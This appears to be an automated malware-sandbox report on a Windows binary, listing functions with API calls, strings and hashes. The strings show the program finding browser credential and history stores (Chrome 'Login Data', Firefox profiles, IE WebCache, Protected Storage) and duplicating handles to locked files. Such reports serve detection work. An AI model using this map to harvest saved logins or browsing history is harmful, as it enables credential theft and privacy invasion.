Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00442628, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00443490,00000070), ref: 00442637
__set_app_type.MSVCRT ref: 00442696
__p__fmode.MSVCRT ref: 004426AB
__p__commode.MSVCRT ref: 004426B9
__setusermatherr.MSVCRT ref: 004426E5
_initterm.MSVCRT ref: 004426FB
__wgetmainargs.KERNELBASE ref: 0044271E
_initterm.MSVCRT ref: 00442731
GetStartupInfoW.KERNEL32(?), ref: 0044278E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004427B4
exit.KERNELBASE ref: 004427CB
_cexit.MSVCRT ref: 004427D1

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
Opcode Fuzzy Hash: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409508, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040952C

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B

Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
wcschr.MSVCRT ref: 004095B8
wcschr.MSVCRT ref: 004095D8
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
GetLastError.KERNEL32 ref: 00409607
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
FindCloseUrlCache.WININET(?), ref: 00409644

Strings

visited:, xrefs: 0040959C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
String ID: visited:
API String ID: 615219573-1702587658
Opcode ID: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
Opcode Fuzzy Hash: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408C67, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28

memset.MSVCRT ref: 00408CAF

Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2

free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74E5F560), ref: 00408D7D

Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A

Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153

_snwprintf.MSVCRT ref: 00408D49

Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D

Strings

Containers, xrefs: 00408C87
Container_%I64d, xrefs: 00408D38
, xrefs: 00408CCA
ContainerId, xrefs: 00408CEE
Name, xrefs: 00408CFB

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 2804212203-2982631422
Opcode ID: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
Instruction ID: ce292a4a65043f2a6a20625204029b960355a9169e5f8c073e361fa6e4a76ec5
Opcode Fuzzy Hash: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
Instruction Fuzzy Hash: 1E313E72D00219AADF50EFA5DD85ADEB7B8AF04354F50017FA508B21C1DE78AE458F68

Uniqueness

Uniqueness Score: -1.00%

Function 00409A34, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3

Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E

Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607

Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
Part of subcall function 00409657: RegEnumValueW.ADVAPI32 ref: 004096F5
Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
Part of subcall function 00409657: RegEnumValueW.ADVAPI32 ref: 00409789

Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F

_wcslwr.MSVCRT ref: 00409AFC
wcslen.MSVCRT ref: 00409B11

Strings

https://www.google.com/accounts/servicelogin, xrefs: 00409A76
https://login.yahoo.com/config/login, xrefs: 00409A90
/, xrefs: 00409B1D
http://www.facebook.com/, xrefs: 00409A83
/, xrefs: 00409B31

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 4091582287-4196376884
Opcode ID: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
Instruction ID: 093a45ac9553ae88d2071121675ee446b985e814abadd75c8d2b77a0ae050712
Opcode Fuzzy Hash: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
Instruction Fuzzy Hash: F731D872A1015466CB20BB6ACC4599F77A8AF80344B25087AF804B72C3CBBCEE45D699

Uniqueness

Uniqueness Score: -1.00%

Function 004090DF, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409102
memset.MSVCRT ref: 0040911A

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

wcslen.MSVCRT ref: 00409136
wcslen.MSVCRT ref: 00409145
wcslen.MSVCRT ref: 0040918C
wcslen.MSVCRT ref: 0040919B

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409130, 00409135, 0040915E
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 00409187, 004091AF

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 2036768262-2114579845
Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00441683, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00441734

Strings

RTRIM, xrefs: 004417C6
no such vfs: %s, xrefs: 0044177E
BINARY, xrefs: 0044179D, 004417A2, 004417AE, 004417BA, 004417DF
NOCASE, xrefs: 004417F7
temp, xrefs: 00441876
main, xrefs: 00441866

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
Instruction ID: 3c8b5220aebea45aa68cfe54a9ecef019ebf38e5b75abdf02c998a5d3c6681b4
Opcode Fuzzy Hash: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
Instruction Fuzzy Hash: 8E71D4B1600301BFF310AF16DCC1A6ABB98BB45318F14452FF459DB252D7B9A8D18B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040320A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F

Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
Part of subcall function 00410168: memset.MSVCRT ref: 004102D9

Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E

memset.MSVCRT ref: 0040330A
memcpy.MSVCRT ref: 0040331C
wcscmp.MSVCRT ref: 00403348
_wcsicmp.MSVCRT ref: 00403385

Strings

, xrefs: 00403235
J/@, xrefs: 004032EC

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
String ID: $J/@
API String ID: 1763786148-830378395
Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDFA, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9

memset.MSVCRT ref: 0040EE42
wcslen.MSVCRT ref: 0040EE59
wcslen.MSVCRT ref: 0040EE61
wcslen.MSVCRT ref: 0040EEBC
wcslen.MSVCRT ref: 0040EECA

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

history.dat, xrefs: 0040EE22, 0040EE5E, 0040EE70
places.sqlite, xrefs: 0040EEC3, 0040EED8

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscat$wcscpy
String ID: history.dat$places.sqlite
API String ID: 2541527827-467022611
Opcode ID: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
Instruction ID: 5a7552f2f2193819142f663f69cd0b376b18013dc8e05bcebec127321fadfdaa
Opcode Fuzzy Hash: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
Instruction Fuzzy Hash: AD315232D0411DAADF10EBA6D845ACDB3B8AF00319F6048BBE514F21C1E77CAA45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00410075, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410097
wcslen.MSVCRT ref: 004100A2
wcslen.MSVCRT ref: 004100B0
wcslen.MSVCRT ref: 00410105
wcslen.MSVCRT ref: 00410113

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

Web Data, xrefs: 004100A8, 004100AD, 004100C3
Login Data, xrefs: 0041010B, 00410110, 00410121

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memsetwcscatwcscpy
String ID: Login Data$Web Data
API String ID: 3932597654-4228647177
Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00415BAE, Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,-7FBEAA6E,00000003,00000000,?,?,00000000), ref: 00415C86
CreateFileA.KERNEL32(?,-7FBEAA6E,00000003,00000000,00415512,00415512,00000000), ref: 00415C9E
GetLastError.KERNEL32 ref: 00415CAD
free.MSVCRT(?), ref: 00415CBA

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile$ErrorLastfree
String ID:
API String ID: 77810686-0
Opcode ID: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
Instruction ID: e414679dc355763f7cb5844f7b2dc3c916de6b309c6ec43d815c5638ef366406
Opcode Fuzzy Hash: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
Instruction Fuzzy Hash: 7741D0B1508701EFE7109F25EC4169BBBE5EFC4324F14892EF49596290E378D9848B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040F026, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F042
memset.MSVCRT ref: 0040F057

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3

wcscat.MSVCRT ref: 0040F080

Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E

wcscat.MSVCRT ref: 0040F0A9

Strings

Mozilla\Firefox\Profiles, xrefs: 0040F0A3
Mozilla\Profiles, xrefs: 0040F07A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 1534475566-1174173950
Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412270, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
memset.MSVCRT ref: 004122C9
RegCloseKey.ADVAPI32(?), ref: 00412330
wcscpy.MSVCRT ref: 0041233E

Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2699640517-2036018995
Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E

Uniqueness

Uniqueness Score: -1.00%

Function 00411A13, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00411A2D
_snwprintf.MSVCRT ref: 00411A52
WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
GetPrivateProfileStringW.KERNEL32 ref: 00411A88

Strings

"%s", xrefs: 00411A41

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
Instruction ID: ae5f1e9df6cd2f4a0780795b96407545f38e06b3c9618b8e9942ee44aab69889
Opcode Fuzzy Hash: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
Instruction Fuzzy Hash: 2101283240521ABAEF219F81EC05FDA3A6AFF04785F104066BA1960161D779C661EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411140, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E

Strings

GetProcessTimes, xrefs: 0041115B
kernel32.dll, xrefs: 0041114C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9D5, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041CA32
memcmp.MSVCRT ref: 0041CA5D
memcmp.MSVCRT ref: 0041CAC9

Strings

SQLite format 3, xrefs: 0041CA50
@ , xrefs: 0041CAC3

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 953d5ab274d32c9ae73e8328ac1599b15b087ad643e7854322da15e15f5529bb
Instruction ID: bd67d5102a3eb66ea4de4e64a8b31fca419cb069452d494a6197ab8253893597
Opcode Fuzzy Hash: 953d5ab274d32c9ae73e8328ac1599b15b087ad643e7854322da15e15f5529bb
Instruction Fuzzy Hash: D351D1719442149FDF10DF69C8827EAB7F4AF44314F14019BE804EB346E778EA85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0AC, Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
DeleteObject.GDI32(?), ref: 0040E129
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
LoadIconW.USER32(00000000,00000065), ref: 0040E17A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$DeleteHandleIconLoadModuleObject
String ID:
API String ID: 659443934-0
Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58

Uniqueness

Uniqueness Score: -1.00%

Function 00408FA4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
Part of subcall function 00408B10: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
Part of subcall function 00408B10: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
Part of subcall function 00408B10: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
Part of subcall function 00408B10: WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
Part of subcall function 00408B10: FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30

FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074

Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE

DeleteFileW.KERNELBASE(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC

Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74E5F560), ref: 00408D7D

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
API String ID: 3931293568-1514811420
Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFDE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040CFFF
qsort.MSVCRT ref: 0040D0A9

Strings

/sort, xrefs: 0040CFFA
/nosort, xrefs: 0040D05F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409EB8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004117E3: FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF

LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC

Strings

PStoreCreateInstance, xrefs: 00409ED6
pstorec.dll, xrefs: 00409EC4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: PStoreCreateInstance$pstorec.dll
API String ID: 145871493-2881415372
Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
